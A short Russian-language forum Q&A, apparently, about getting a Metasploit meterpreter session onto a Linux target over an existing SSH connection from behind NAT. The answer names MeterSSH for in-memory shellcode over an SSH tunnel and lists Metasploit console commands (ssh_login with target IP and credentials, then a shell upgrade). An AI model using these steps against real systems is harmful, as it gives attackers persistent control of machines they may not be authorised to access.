Я за NAT.
Я могу войти через ssh к цели.
Как использовать metasploit / Send meterpreter через это соединение SSH?
Я попытался shell_to_meterpreter но это не удалось, потому что я не могу открыть свой порт для обратного TCP для подключения.
Обе машины на Linux.
Окна:
Вы можете попробовать использовать MeterSSH.
MeterSSH - это простой способ внедрить собственный шелл-код в память и направить что-либо по SSH на компьютер атакующего через туннель SSH, и все это содержится в одном файле Python.
Linux:
Вы можете использовать вспомогательный модуль metasploit под названием ssh_login:
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.0.109
msf auxiliary(ssh_login) > set username foo
msf auxiliary(ssh_login) > set password bar
msf auxiliary(ssh_login) > exploit
Теперь преобразуйте командную оболочку в оболочку meterpreter с помощью следующей команды
session –u 1